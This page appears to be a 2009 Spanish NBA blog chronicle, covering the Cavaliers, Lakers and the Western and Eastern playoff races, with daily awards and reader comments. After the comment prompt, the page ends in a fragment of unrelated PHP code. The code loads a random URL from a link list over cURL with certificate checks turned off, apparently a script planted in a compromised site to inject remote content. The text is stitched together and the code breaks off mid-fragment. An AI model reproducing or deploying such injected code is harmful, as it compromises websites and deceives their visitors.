La Crónica (31/03/2009)

01 de April de 2009 por TheDeerHunter

La liga regular continúa inexorablemente hacia su final.

Definitivamente asegurarán los Cavs la ventaja campo en su camino hacia el título ganando pasado mañana en Washington y amarrando los 4 encuentros en su casa (40-1 de locales, igualando el récord de los Celtics de Bird). Se pegarán en los próximos días contra Orlando, Boston, San Antonio y Philadelphia y si gana estos duelos el golpe de autoridad puede ser muy gordo. Anoche alguno de vosotros se acordaría de nuestros parientes próximos si cometisteis el error de seguir nuestra recomendación contra Detroit. El partido fue repulsivo pero resume como funciona el equipo ahora mismo más letal de la competición: Si juegas a muchos puntos te gana y si juegas a pocos… también te gana. Si juegas bonito o si juegas feo al Elegido y su guardia pretoriana les da lo mismo.

Ya dijimos que los Lakers habían dicho todo lo que tenían que decir en ese frente ahora mismo. Desde ese prisma no es extraño que pierdan contra unos Bobcats motivadísimos. Sí lo es más que Pau siga jugando 45 minutos y Kobe&Odom cerca de 40. La realidad es que no pueden bajar los brazos y que tienen a Orlando y Boston soplándoles el cogote. 6 partidos de 8 tendrán que ganar para asegurarse la ventaja campo en una hipotética final contra ellos. Memphis y Clippers en casa parecen asequibles. Pero recibir a Houston, Denver o Utah y visitar otra vez el infierno del Rose Garden no lo parece tanto y menos con el nivel tan bajo que está demostrando la segunda unidad. Por suerte la rodilla de Bynum parece resistir bien el peso de una conejita de 50kg… Esa sí que es buena noticia (sobre todo para él).

Por su parte los Spurs no lo tienen mejor que los Lakers. Ayer cascaron contra los Thunder… otra vez y mientras tanto los Nuggets, con un gran Carmelo a la cabeza, ganaron a los Knicks y les birlaron la 2ª plaza, con Houston empatados. Pero ahí no acaba la cosa, los Hornets se llevaron un partidazo en Sacramento con buzzer-beater de Rasual Butler y los Blazers, sin Rudy, destrozaron a los Jazz en el Rose. Entre la 2ª y la 7ª tres partidos de diferencia. Sería un buen objeto de estudio analizar el calendario de cada uno y las posibilidades de cara al orden final. Si alguien se anima… Los Mavericks también ganaron, por cierto y aún tendrían opciones de evitar a los Lakers, si es que es eso lo que quieren.

Finalmente otros dos partidazos del Este. Mal disgusto se llevaron los Bulls en Indianápolis y se vuelven a poner en jaque con respecto a los Bobcats. Los Sixers se fundieron a los Hawks y empatan con Miami en la 5ª plaza. La diferencia entre ser quintos y ser sextos es enfrentarse a Boston o a Atlanta en primera ronda. Normal que todos aprieten.

PREMIOS

MVP: Victoria en el último segundo de NOH con un David West destacadísimo durante todo el partido. 40 puntos, 9 rebotes y 6 asistencias en, probablemente, la actuación más completa de la temporada. Mención para los 31 puntos de Kevin Durant.

Rookie: Partidazos de Derrick Rose y Kevin Love. El base hizo todo lo que estaba en su mano para llevarse la victoria aportando 24 puntos, 11 rebotes y 6 asistencias y el pívot fue el mejor de su equipo (algo tampoco muy dificíl) con sus 23 puntos y 12 rebotes.

Sorpresa: Casi no hablamos de él y eso que ha jugado como titular la mayoría de partidos de los Blazers. Posiblemente la frecuencia con la que acaba los partidos con menos de 5 puntos hacen que nos olvidemos del trabajo tan oscuro que realiza. Hablamos del Nicolas Batum que hoy anotado 17 puntos y recogido 5 rebotes.

Decepción: Repite premio el binomio Prince-Stuckey que ha demostrado en esta plaga de lesiones de los PIstons que no está llamado a liderar al equipo. Hoy, 6 de 24 entre los 2.

Esfuerzo en vano: El de la pareja Rose-Hinrich (44 puntos, 18 rebotes y 13 asistencias) que ha visto como se le escapaba el partido en los últimos segundos.  Buen partido de Josh Smith en la derrota de Atlanta con 33 puntos y 13 de 15 en tiros de campo.

LA PREGUNTA DEL DÍA

Bobcats, Bulls y Pistons… ¿Quién se quedará fuera?

Comenta

5 comentarios a esta entrada

  1. JJ5 dice:
    #1

    Yo veo a los Bulls dentro de lo que cabe bastante bien, con una batería interesante de jugadores.
    Los Pistons son la decepción del año, y los Bobcats una de las sorpresas, ¡quién lo iba decir con Larry Brown!

    Habría que echar mano de calendario para dirimirlo.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    en alguna ocasión ¿la fase regular continúa normalmente?

      Citar

  3. TheDeerHunter dice:
    #3

    inexorablemente normal… pues eso ;b

      Citar

  4. TheDeerHunter dice:
    #4

    En el informe semanal hicimos un boceto de lo que van a enfrentar esta semana los tres equipos… aunque de momento, las previsiones de Chicago y Charlotte ya van mal con los resultados de hoy. Malo para Detroit, sobre todo.

      Citar

  5. Jabho dice:
    #5

    Yo creo que los Bulls entraran y dudo entre Bobcats y Pistons. Dos partidos de ventaja a falta de 8 es mucho, pero veo a los Pistons mu malamente y además eso de entrar en PO como 8º no parece ir con ellos… Para Bobcats sin embargo entrar aunque sea 8º y para irse a casa creo que es un premio…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>